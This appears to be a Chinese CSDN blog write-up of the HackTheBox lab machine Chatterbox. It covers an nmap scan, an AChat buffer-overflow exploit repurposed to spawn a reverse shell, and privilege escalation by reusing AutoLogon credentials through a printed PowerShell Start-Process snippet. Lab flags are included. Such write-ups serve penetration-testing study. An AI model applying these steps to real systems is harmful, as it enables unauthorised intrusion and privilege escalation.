HTB-oscplike-Chatterbox

最新推荐文章于 2024-07-20 15:57:52 发布
最新推荐文章于 2024-07-20 15:57:52 发布
阅读量661 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/124068700
版权

HTB-oscplike-Chatterbox

今天就打了一个 因为我的论文到现在还一个字没动捏

Chatterbox

medium难度的chatterbox 靶机IP 10.10.10.74

sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.74
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp open http AChat chat system httpd
9256/tcp open achat AChat chat system

铁searchsploit achat了 看到一个缓冲区溢出能用 里面还给出了payload生成方式
太贴心了 把calc.exe换成执行我们的shell 起个http弹回shell 拿到user的flag
9695fa9785ffc2a0ee88a655c34e568e

提权老套路 上心爱的扫描器 可能这就是脚本小子的宿命吧
然后发现没扫到能用的漏洞 内核漏洞寄了 不过在winpeas里还看到了
??? Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultUserName : Alfred
DefaultPassword : Welcome1!

看上去非常突兀 那么有没有可能是凭据复用呢 在stackoverflow找到方法
$secpasswd = ConvertTo-SecureString ‘Welcome1!’ -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential (‘Administrator’, $secpasswd)
Start-Process -FilePath “c:\users\public\shell.exe” -Credential $mycreds -NoNewWindow

弹回administrator的shell 拿到flag
f11b3d9ba594233eeba15956535cc545
请添加图片描述

ore0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hackthebox-chatterbox(考点:achat缓冲区溢出利用/windows账号利用/端口转发)
冬萍子癸水
04-07 634
nmap搞起 TMD扫了几次都没扫出来 噢提示1000个常用都被过滤了,那我扫更高的1000-10000 ok了,两个稀奇古怪端口,鬼TM知道是什么 好吧,searchsploit achat 就用36025.py buffer flow吧 作者很贴心,把坏字符和生成的方法都写出来了.我们做的就是替换自己ip/端口的shellcode,以及修改目标IP和cmd指令 普通shell: msfve...
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The BoxHTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
HTB-Chatterbox
TA不懒,但还没有添加简介
10-01 597
HTB-Chatterbox
一个即时聊天系统,我叫它 Chatterbox(话匣子)
拖孩
06-21 700
🎈Chatterbox(话匣子)是im-vue重构后的即时聊天系统🆕。 是通过 Websocket 实现了消息的实时传递 和 通过 RTCPeerConnection 实现了语音通话、视频通话。
No.62-HackTheBox-windows-Chatterbox-Walkthrough渗透学习
qq_34801745的博客
02-27 498
** HackTheBox-windows-Chatterbox-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/123 靶机难度:中级(4.0/10) 靶机发布日期:2018年6月16日 靶机描述: Chatterbox is a fairly straightforward machine that req...
Hackthebox------Jerry
大方子
11-24 3043
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBoxHTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
Nmap扫描工具介绍
测试开发小记
03-27 2383
目录Nmap简介及安装Nmap 特性Nmap安装centos7WindowsNmap命令扫描单个主机扫描多个主机隐秘扫描(Stealth scan)版本扫描操作系统探测端口扫描读取文件扫描扫描日志NSE脚本NSE脚本类别NSE脚本示例discoveryauthbruteZenmap可视化总结 Nmap (Network Mapper) 是在渗透测试中常用的扫描工具,可用于扫描网络中的 IP 地址和端口,并检测已安装的应用程序。无论是作为网络安全工具还是黑客工具,Nmap 是一个很强大的工具,在《黑客帝国2》
hack the box(5985 WinRM)
m0_56010012的博客
04-18 2037
nmap参数定义 -v:增加详细级别(基本上输出更多信息)-p-:此标志扫描0-65535范围内的所有TCP端口-sV:尝试确定端口上运行的服务版本-sC:使用默认NSE脚本扫描--min-rate:这用于指定Nmap每秒应发送的最小数据包数;数字越高,扫描速度越快 nmap -v -p- --min-rate 5000 -sV -sC 10.129.136.91 根据Nmap扫描的结果,机器使用Windows作为操作系统,在端口80上运行Apache Web服务器,在端口5985上运行WinR.
Nmap详解(续)
永不垂头的博客
07-14 258
学习笔记—Nmap详解(续) 1.nmap -O 192.168.1.106 --osscan-guess 2. nmap -O 192.168.1.106 -T 5(2安全,5快) 3.nmap 192.168.1.106 --scan-delay 3s -v(每隔三秒,但有延迟) 4. nmap 192.168.1.106 --min-rate 20000(最快,最短时间) 5. nmap -D 192.168.1.104,192.168.1.106(混淆地址) 6. nmap -S 192.
【网络安全科普】勒索病毒 防护指南
最新发布
a38417的博客
07-20 595
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 927
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 564
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1140
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
Web安全:未验证的重定向和转发.
网络安全领域___专研者.
07-19 590
未验证的重定向和转发漏洞是一种常见的Web安全漏洞,它允许攻击者将用户重定向到一个恶意的URL,而不是预期的安全URL。这种漏洞通常发生在应用程序处理重定向和转发请求时,未能对目标URL进行适当的验证和过滤。
CVE-2023-4016
08-17
- *1* *2* [HTB HARD 靶机 Cerberus WriteUp](https://blog.csdn.net/qq_58869808/article/details/129786875)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值